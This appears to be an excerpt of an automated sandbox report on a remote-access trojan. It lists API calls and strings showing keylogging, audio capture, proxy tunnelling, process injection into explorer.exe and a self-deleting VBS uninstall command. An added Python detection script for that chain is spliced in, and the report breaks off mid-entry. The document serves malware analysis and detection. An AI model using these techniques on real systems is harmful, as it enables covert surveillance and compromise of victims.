                                                          • API String ID: 161543041-0
                                                          • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                          • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                          • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                          • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041912D
                                                          • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                          • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                          • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                          • API String ID: 489098229-65789007
                                                          • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                          • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                          • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                          • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                          APIs
                                                          • connect.WS2_32(?,?,?), ref: 004042A5
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                          • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                          • API String ID: 994465650-2151626615
                                                          • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                          • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                          • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                          • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                          APIs
                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                          • ExitProcess.KERNEL32 ref: 0040C832
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                          • API String ID: 1913171305-390638927
                                                          • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                          • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                          • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                          • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
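The block above documents the implant's uninstall routine: GetModuleFileNameW resolves its own path, a .vbs stub is written under Temp whose body runs `cmd /c "..."` and then calls `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`, the stub is launched with ShellExecuteW("open") and the process exits. The following Python is an added example, not part of the Joe Sandbox report, showing how that chain looks in endpoint telemetry and how to correlate it. Field names follow Sysmon EventID 1 (ProcessCreate), 11 (FileCreate) and 23/26 (FileDelete); the event list is constructed for the demonstration (the file names, timestamps and the 30-second window are assumptions, not values taken from this sample).

```python
"""Correlate the drop -> run -> self-delete chain of a VBS stub written to Temp.

Added example, not Joe Sandbox output.  EVENTS is constructed telemetry shaped
like Sysmon records; the only value taken from the report is the injected host
process, aspnet_compiler.exe.  WINDOW and the paths are assumptions.
"""
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WINDOW = timedelta(seconds=30)   # assumed: the stub must run within 30 s of being written

# Constructed telemetry: one malicious chain, then a benign logon-script run.
EVENTS = [
    {"EventID": 11, "UtcTime": "2024-12-19 10:00:01.000",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\update.vbs"},
    {"EventID": 1, "UtcTime": "2024-12-19 10:00:02.000",
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\update.vbs"'},
    {"EventID": 1, "UtcTime": "2024-12-19 10:00:02.500",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'cmd /c "C:\Users\user\AppData\Roaming\svchelper\svchelper.exe"'},
    {"EventID": 23, "UtcTime": "2024-12-19 10:00:03.000",
     "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\update.vbs"},
    {"EventID": 1, "UtcTime": "2024-12-19 10:05:00.000",
     "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cscript.exe \\fileserver\netlogon\map_drives.vbs"},
]


def _ts(e):
    return datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_vbs_drop_chain(events):
    """One alert per .vbs written under a Temp folder by a process that is not a
    script host and then executed by wscript/cscript inside WINDOW.  The alert
    records what the script spawned and whether it deleted itself afterwards,
    which is what the DeleteFile(Wscript.ScriptFullName) stub does."""
    events = sorted(events, key=_ts)
    alerts = []
    for drop in events:
        if drop["EventID"] != 11:
            continue
        path = drop["TargetFilename"].lower()
        if (not path.endswith(".vbs") or "\\temp\\" not in path
                or _base(drop["Image"]) in SCRIPT_HOSTS):
            continue
        t0, t1 = _ts(drop), _ts(drop) + WINDOW
        in_window = [e for e in events if t0 <= _ts(e) <= t1]
        runs = [e for e in in_window if e["EventID"] == 1
                and _base(e["Image"]) in SCRIPT_HOSTS
                and path in e["CommandLine"].lower()]
        if not runs:
            continue
        # children of the script host inside the window: the "cmd /c ..." the stub runs
        spawned = [e["CommandLine"] for e in in_window if e["EventID"] == 1
                   and _base(e.get("ParentImage", "")) in SCRIPT_HOSTS]
        deleted = any(e["EventID"] in (23, 26) and e["TargetFilename"].lower() == path
                      for e in in_window)
        alerts.append({"dropper": drop["Image"], "script": drop["TargetFilename"],
                       "script_host": runs[0]["Image"], "spawned": spawned,
                       "self_deleted": deleted})
    return alerts


if __name__ == "__main__":
    for alert in detect_vbs_drop_chain(EVENTS):
        print(alert)
```

The benign cscript run is never considered because no FileCreate for its script exists in Temp; requiring the drop event, not just "script host started from Temp", is what keeps the rule quieter than the generic Sigma matches listed at the top of the report.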
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                          • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                          • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                          • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                          APIs
                                                            • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                          • GetLastError.KERNEL32 ref: 00454A96
                                                          • __dosmaperr.LIBCMT ref: 00454A9D
                                                          • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                          • GetLastError.KERNEL32 ref: 00454AB3
                                                          • __dosmaperr.LIBCMT ref: 00454ABC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                          • CloseHandle.KERNEL32(?), ref: 00454C26
                                                          • GetLastError.KERNEL32 ref: 00454C58
                                                          • __dosmaperr.LIBCMT ref: 00454C5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                          • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                          • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                          • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040A456
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                          • GetForegroundWindow.USER32 ref: 0040A467
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                          • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                          • API String ID: 911427763-3954389425
                                                          • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                          • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                          • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                          • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                          • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                          • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                          • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                          • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                          • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                          • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                          • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                          • __dosmaperr.LIBCMT ref: 004393CD
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                          • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                          • __dosmaperr.LIBCMT ref: 0043940A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                          • __dosmaperr.LIBCMT ref: 0043945E
                                                          • _free.LIBCMT ref: 0043946A
                                                          • _free.LIBCMT ref: 00439471
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                          • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                          • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                          • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                          • TranslateMessage.USER32(?), ref: 00404F30
                                                          • DispatchMessageA.USER32(?), ref: 00404F3B
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: 58bd3a0ae6df6a0bdf912a68ced102d79291154801096aaee71947f3f084d5d0
                                                          • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                          • Opcode Fuzzy Hash: 58bd3a0ae6df6a0bdf912a68ced102d79291154801096aaee71947f3f084d5d0
                                                          • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                          • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                          • String ID: <$@$@FG$@FG$Temp
                                                          • API String ID: 1107811701-2245803885
                                                          • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                          • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                          • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                          • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                          • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                          • API String ID: 2050909247-4145329354
                                                          • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                          • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                          • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                          • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                          • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                          • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                          • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                          APIs
                                                          • _free.LIBCMT ref: 00446DDF
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 00446DEB
                                                          • _free.LIBCMT ref: 00446DF6
                                                          • _free.LIBCMT ref: 00446E01
                                                          • _free.LIBCMT ref: 00446E0C
                                                          • _free.LIBCMT ref: 00446E17
                                                          • _free.LIBCMT ref: 00446E22
                                                          • _free.LIBCMT ref: 00446E2D
                                                          • _free.LIBCMT ref: 00446E38
                                                          • _free.LIBCMT ref: 00446E46
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                          • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                          • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                          • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                          • API String ID: 3578746661-4192532303
                                                          • Opcode ID: 059a6457884d082c372b150a0b2831a4c1b83238499cd6d378c5b4a446b252df
                                                          • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                          • Opcode Fuzzy Hash: 059a6457884d082c372b150a0b2831a4c1b83238499cd6d378c5b4a446b252df
                                                          • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                          • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                          • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                          • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • Sleep.KERNEL32(00000064), ref: 00416688
                                                          • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                          • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                          • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                          • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401AD3
                                                            • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                          • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                          • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                          • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                          • API String ID: 3809562944-3643129801
                                                          • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                          • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
